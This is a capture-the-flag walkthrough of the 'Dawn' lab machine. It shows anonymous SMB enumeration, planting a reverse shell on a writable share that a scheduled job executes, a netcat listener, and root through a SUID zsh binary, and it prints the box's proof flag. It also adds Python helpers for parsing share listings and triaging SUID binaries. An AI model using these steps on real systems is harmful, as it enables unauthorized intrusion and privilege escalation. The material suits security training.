Dawn
On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.
kali@kali:~/dawn$ smbclient -U '' -L \\\\192.168.55.11\\
Enter WORKGROUP\'s password:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
kali@kali:~/dawn$
kali@kali:~/dawn$ smbclient -U '' \\\\192.168.55.11\\ITDEPT
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Wed Jul 22 13:19:41 2020
7158264 blocks of size 1024. 3518364 blocks available
smb: \>
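When enumerating a whole subnet rather than one box, it helps to pull the share table out of `smbclient -L` output programmatically and decide which shares to try anonymously first. The following is an added example for this writeup, not a tool from the original post; the share types and the list of administrative shares to skip are assumptions based on the usual Samba defaults, and the sample listing is the one shown above, embedded as constructed input.

```python
"""Parse `smbclient -L` output and pick out the shares worth probing anonymously.

Added example, not part of the original writeup. KNOWN_TYPES and SKIP_SHARES
are assumptions based on the usual Samba/Windows defaults.
"""

# Assumed: the share types smbclient prints in its listing.
KNOWN_TYPES = {"Disk", "IPC", "Printer"}
# Assumed: administrative or driver shares that rarely hold interesting files.
SKIP_SHARES = {"print$", "IPC$", "ADMIN$", "C$"}


def parse_share_listing(text):
    """Return [(name, type, comment), ...] from the Sharename table.

    The comment column may itself contain spaces (the ITDEPT banner does),
    so each row is split into at most three fields. The table ends at the
    first line whose second field is not a known share type.
    """
    shares = []
    in_table = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Sharename"):
            in_table = True
            continue
        if not in_table or not line or line.startswith("---"):
            continue
        parts = line.split(None, 2)
        if len(parts) < 2 or parts[1] not in KNOWN_TYPES:
            # e.g. "SMB1 disabled -- no workgroup available" ends the table.
            break
        name, stype = parts[0], parts[1]
        comment = parts[2] if len(parts) == 3 else ""
        shares.append((name, stype, comment))
    return shares


def candidate_shares(shares):
    """Disk shares that are neither hidden ($-suffixed) nor administrative."""
    return [name for name, stype, _ in shares
            if stype == "Disk" and name not in SKIP_SHARES
            and not name.endswith("$")]


# Constructed sample input: the listing from the page, as captured.
SAMPLE_LISTING = """\
Enter WORKGROUP\\'s password:

\tSharename       Type      Comment
\t---------       ----      -------
\tprint$          Disk      Printer Drivers
\tITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
\tIPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
"""

if __name__ == "__main__":
    found = parse_share_listing(SAMPLE_LISTING)
    for name, stype, comment in found:
        print(f"{name:<10} {stype:<8} {comment}")
    print("probe first:", candidate_shares(found))
```

On the Dawn listing this leaves only ITDEPT, which is exactly the share the writeup goes on to connect to; the banner comment is kept intact so it can be reviewed, since share comments on CTF boxes (and on real networks) often carry hints or warnings worth reading.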
Using curl to test for file upload on the share, I confirmed I was able to upload a PHP reverse shell, which might come in handy later.
Enter host password for user '':
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5496    0     0  100  5496      0   536k --:--:-- --:--:-- --:--:--  596k
kali@kali:~/dawn$
Running dirsearch.py against port 80 reveals two interesting directories. Moving into logs shows a list of log files, of which management.log is the only one we have permission to read.
Reading the log file, the lines below appear frequently.
Knowing that we have write access to the ITDEPT share, we can upload a reverse shell named web-control, and in theory it should be executed.
First I created a file called web-control containing a netcat reverse shell, then uploaded it to the SMB share.
smb: \> put web-control
putting file web-control as \web-control (81.0 kb/s) (average 30.2 kb/s)
smb: \> ls
  .                                   D        0  Thu Sep  2 09:34:20 2021
  ..                                  D        0  Wed Jul 22 13:19:41 2020
  rev.php                             A     5496  Thu Sep  2 09:13:41 2021
  web-control                         A       83  Thu Sep  2 09:38:54 2021

                7158264 blocks of size 1024. 3518292 blocks available
smb: \>
Shortly after, a shell comes back on my netcat listener. Note that it runs as www-data, not root: whatever executes web-control does so as the web user, so this is only a foothold and privilege escalation is still needed.
kali@kali:~/dawn$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [192.168.55.200] from (UNKNOWN) [192.168.55.11] 34450
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
A search for SUID binaries reveals zsh as having the SUID bit set.
www-data@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
www-data@dawn:~$
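Eyeballing a SUID list works on a lab box with eighteen entries, but the habit worth building is to diff the listing against what the distribution ships and look at the leftovers. The script below is an added example for this writeup, not a tool from the original post. The baseline it uses is an assumption: the SUID set a stock Debian 10 install carries, which happens to be the listing above minus the two entries that stand out. On a real engagement, regenerate the baseline from a known-good host of the same build rather than trusting this one.

```python
"""Triage a `find / -perm -4000` listing against a baseline of expected SUID files.

Added example, not part of the original writeup. DEBIAN_BASELINE, SHELL_LIKE
and SUSPECT_PREFIXES are constructed/assumed lists, not data from the page's
target beyond the listing itself.
"""
import os

# Assumed baseline: SUID paths on a stock Debian 10 box (constructed).
DEBIAN_BASELINE = {
    "/usr/sbin/mount.cifs",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/bin/su",
    "/usr/bin/newgrp",
    "/usr/bin/pkexec",
    "/usr/bin/passwd",
    "/usr/bin/sudo",
    "/usr/bin/mount",
    "/usr/bin/gpasswd",
    "/usr/bin/chsh",
    "/usr/bin/fusermount",
    "/usr/bin/umount",
    "/usr/bin/chfn",
}

# Constructed list: binaries that hand over a shell or arbitrary command
# execution directly when SUID root, so they are the first thing to try.
SHELL_LIKE = {
    "zsh", "bash", "sh", "dash", "ksh", "csh", "tcsh", "fish",
    "python", "python2", "python3", "perl", "ruby", "find", "env",
    "vim", "vi", "nano", "less", "more", "awk", "gawk",
}

# Constructed list: locations where a SUID file almost never belongs.
SUSPECT_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/", "/var/www/")


def parse_find_output(text):
    """Return the absolute paths in a `find / -perm -4000` listing.

    Tolerates the shell prompt and the echoed command that end up in a
    pasted pty session, as in the writeup's own capture.
    """
    return [line.strip() for line in text.splitlines()
            if line.strip().startswith("/")]


def triage_suid(paths, baseline=DEBIAN_BASELINE):
    """Sort SUID paths into expected / shell_like / odd_location / unexpected."""
    result = {"expected": [], "shell_like": [], "odd_location": [], "unexpected": []}
    for p in paths:
        name = os.path.basename(p)
        if p in baseline:
            result["expected"].append(p)
        elif name in SHELL_LIKE:
            result["shell_like"].append(p)
        elif p.startswith(SUSPECT_PREFIXES):
            result["odd_location"].append(p)
        else:
            result["unexpected"].append(p)
    return result


# Constructed sample input: the listing from the page, as captured.
SAMPLE_FIND_OUTPUT = """\
www-data@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
www-data@dawn:~$
"""

if __name__ == "__main__":
    for bucket, items in triage_suid(parse_find_output(SAMPLE_FIND_OUTPUT)).items():
        if bucket != "expected":
            print(f"{bucket}: {items}")
```

Run against the Dawn listing it returns /usr/bin/zsh as the only shell-like hit and /home/dawn/ITDEPT as the only odd-location hit. The second one is the share directory itself; the setuid bit does nothing on a directory under Linux, but a mode like that on a world-writable share is still a configuration oddity worth recording in the report.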
Since zsh is a shell, all we need to do is execute the full path to the SUID binary to get a root shell. Note in the output below that only the effective uid becomes root (euid=0) while the real uid stays 33; that is still enough to read /root.
www-data@dawn:~$ /usr/bin/zsh
/usr/bin/zsh
dawn# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
dawn# cd /root
cd /root
dawn# ls
ls
flag.txt  proof.txt
dawn# cat flag.txt
cat flag.txt
Your flag is in another file...
dawn# cat proof.txt
cat proof.txt
04bf91ebc2de37fbee66338c45a80b95
dawn#